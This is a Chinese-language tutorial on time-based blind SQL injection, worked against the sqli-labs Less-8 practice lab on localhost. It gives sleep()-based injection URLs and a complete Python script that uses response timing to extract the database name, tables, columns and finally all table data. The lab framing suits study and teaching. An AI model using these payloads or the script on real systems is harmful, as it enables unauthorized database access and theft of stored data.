0%

SQL盲注--时间盲注

5fb790ed39854.jpg

时间盲注

如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)这个时候需要进行时间盲注。时间盲注,通过提交对执行时间铭感的函数sql语句,执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的时间盲注。

例题

这里以sqli-lab第8关为例,这个题可以使用布尔盲注的方式,去注入,这里为了学习时间盲注,所以不用布尔盲注了。

正常网页回显

1
http://127.0.0.1/sqli/Less-8/?id=1

存在注入点

1
http://127.0.0.1/sqli/Less-8/?id=1'

爆破数据库长度

当我们输入正确的时候,页面返回很快,输入错误的时候则返回很慢。

1
http://127.0.0.1/sqli/Less-8/?id=1' and if(length(database())=8,1,sleep(5)) --+

爆破数据库名

当我们输入正确时,页面返回很快,输入错误的时候则返回很慢。

1
http://127.0.0.1/sqli/Less-8/?id=1' and if(mid((select database()),1,1)='s',1,sleep(5)) --+

这里我使用脚本进行注入,手工太慢了,懒得一批

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
import requests
import time

def db_length(url):
print("[-]开始爆破数据库名长度.......")
num=1
while True:
db_payload=url+"' and if(length(database())=%d,1,sleep(3)) --+"%num
start_time=time.time()
r=requests.get(db_payload)
if time.time() - start_time <4:
db_length=num
break
else:
num+=1
print("[+]数据库长度:%d\n"%db_length)
return db_length

def db_name(url,db_length):
print("[-]开始爆破数据库名.......")
db_name=''
for i in range(1,db_length+1):
max=127
min=33
while abs(max-min)>1:
midx=int((max+min)/2)
db_name_payload=url+"' and if(ord(mid((database()),%d,1))>%d,1,sleep(3)) --+"%(i,midx)
#print(db_name_payload)
start_time=time.time()
r=requests.get(db_name_payload)
if time.time()-start_time < 4:
min=midx
else:
max=midx
db_name+=chr(max)
print("[+]数据库名:%s\n"%db_name)
return db_name

def tb_number(url,db_name):
print("[-]开始爆破%s数据库有几张表........"%db_name)
i=1
while True:
tb_payload=url+"' and if((select count(table_name) from information_schema.tables where table_schema='%s')=%d,1,sleep(3)) --+"%(db_name,i)
#print(tb_payload)
start_time=time.time()
r=requests.get(tb_payload)
if time.time()-start_time < 4:
tb_number=i
break
else:
i+=1
print("[+]%s库一共有%d张表\n"%(db_name,tb_number))
return tb_number

def tb_name_length(url,db_name,tb_number):
print("[-]开始爆破表名长度")
j=1
tb_name_length=[]
for i in range(tb_number):
while True:
tb_name_length_payload=url+"' and if((select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d,1,sleep(3)) --+"%(db_name,i,j)
#print(tb_name_length_payload)
start_time=time.time()
r=requests.get(tb_name_length_payload)
if time.time()-start_time < 4:
tb_name_length.append(j)
j=1
break
else:
j+=1
print("[+]表名长度:%s"%tb_name_length)
return tb_name_length

def tb_name(url,db_name,tb_number,tb_name_length):
print("[-]开始爆破表名")
tb_name_list=[]
for i in range(tb_number):
tb_name=''
for j in range(1,tb_name_length[i]+1):
max=127
min=33
while abs((max-min))>1:
midx=int((max+min)/2)
tb_name_payload=url+"' and if(ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))>%d,1,sleep(3)) --+"%(db_name,i,j,midx)
start_time=time.time()
r=requests.get(tb_name_payload)
#print(tb_name_payload)
if time.time() - start_time < 4 :
min=midx
else:
max=midx
tb_name+=chr(max)
tb_name_list.append(tb_name)
print("\n[+]%s库下的%d张表为:%s\n"%(db_name,tb_number,tb_name_list))
return tb_name_list

def column_num(url,tb_name_list):
print("[-]开始爆破每张表的字段数量........")
column_num=[]
j=1
for i in tb_name_list:
while True:
column_num_payload=url+"' and if((select count(column_name) from information_schema.columns where table_name='%s')=%d,1,sleep(3)) --+"%(i,j)
#print(column_num_payload)
start_time=time.time()
r=requests.get(column_num_payload)
if time.time() - start_time < 4:
column_num.append(j)
print("[+]%s表对应字段数为:%d"%(i,j))
j=1
break
else:
j+=1
print("\n[+]%s表对应的字段数:%s\n"%(tb_name_list,column_num))
return column_num

def column_name_length(url,tb_name_list,column_num):
print("[-]开始爆破每张表的字段长度:")
column_name_length=[]
k=1
for i in range(len(tb_name_list)):
for j in range(column_num[i]):
while True:
column_name_length_payload=url+"' and if((select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d,1,sleep(3)) --+"%(tb_name_list[i],j,k)
#print(column_name_length_payload)
start_time=time.time()
r=requests.get(column_name_length_payload)
if time.time() - start_time < 4:
column_name_length.append(k)
k=1
break
else:
k+=1
em_list_length=column_name_length[:column_num[0]]
re_list_length=column_name_length[column_num[0]:column_num[1]+column_num[0]]
ua_list_length=column_name_length[column_num[0]+column_num[1]:column_num[0]+column_num[1]+column_num[2]]
us_list_length=column_name_length[column_num[0]+column_num[1]+column_num[2]:]
print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[0],column_num[0],em_list_length))
print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[1],column_num[1],re_list_length))
print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[2],column_num[2],ua_list_length))
print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[3],column_num[3],us_list_length))
return us_list_length

def column_name(url,tb_name_list,us_list_length):
print("[-]开始爆破%s表的字段名:"%(tb_name_list[3]))
column_name_list=[]
for i in range(len(us_list_length)):
column_name=''
for j in range(1,us_list_length[i]+1):
max=127
min=33
while abs(max-min)>1:
midx=int((max+min)/2)
column_name_payload=url+"' and if(ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))>%d,1,sleep(3)) --+"%(tb_name_list[3],i,j,midx)
#print(column_name_payload)
start_time=time.time()
r=requests.get(column_name_payload)
if time.time() - start_time < 4:
min=midx
else:
max=midx
column_name+=chr(max)
column_name_list.append(column_name)
print("[+]%s表的字段名分别为:%s"%(tb_name_list[3],column_name_list))
return column_name_list

def data_num(url,tb_list_name,db_name):
print('[-]开始爆破%s数据库的%s表有几条数据:'%(db_name,tb_list_name[3]))
i=1
while True:
data_num_payload=url+"' and if((select count(*) from %s.%s)=%d,1,sleep(3)) --+"%(db_name,tb_list_name[3],i)
#print(data_num_payload)
start_time=time.time()
r=requests.get(data_num_payload)
if time.time() - start_time < 4:
data_num=i
break
else:
i+=1
print('[+]%s数据库的%s表有%d条数据'%(db_name,tb_list_name[3],data_num))
return data_num

def dump_data(url,tb_name_list,db_name,column_name_list,data_num):
print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3]))
k=1
data_length=[]
dump_data_list=[]
dump_data=''
for i in column_name_list:
for j in range(data_num):
while True:
dump_data_length_payload=url+"' and if(ascii(substr((select %s from %s.%s limit %d,1),%d,1)),1,sleep(3)) --+"%(i,db_name,tb_name_list[3],j,k)
#print(dump_data_length_payload)
start_time=time.time()
r=requests.get(dump_data_length_payload)
if time.time() - start_time > 4:
dump_data_length=k-1
k=1
break
else:
k+=1
data_length.append(dump_data_length)
for l in range(1,dump_data_length+1):
max=127
min=33
while abs(max-min)>1:
midx=int((max+min)/2)
dump_data_payload=url+"' and if(ord(mid((select %s from %s.%s limit %d,1),%d,1))>%d,1,sleep(3)) --+"%(i,db_name,tb_name_list[3],j,l,midx)
#print(dump_data_payload)
start_time=time.time()
r=requests.get(dump_data_payload)
if time.time() - start_time < 4:
min=midx
else:
max=midx
dump_data+=chr(max)
print(dump_data)
dump_data_list.append(dump_data)
dump_data=''
#print( dump_data_list)
print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3]))
for i in range(13):
print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i]))
#print( dump_data_list)

url="http://127.0.0.1/sqli/Less-8/?id=1"#目标url
db_length=db_length(url)
db_name=db_name(url,db_length)
tb_number=tb_number(url,db_name)
tb_name_length=tb_name_length(url,db_name,tb_number)
tb_name_list=tb_name(url,db_name,tb_number,tb_name_length)
column_num=column_num(url,tb_name_list)
us_list_length=column_name_length(url,tb_name_list,column_num)
column_name_list=column_name(url,tb_name_list,us_list_length)
data_num=data_num(url,tb_name_list,db_name)
dump_data(url,tb_name_list,db_name,column_name_list,data_num)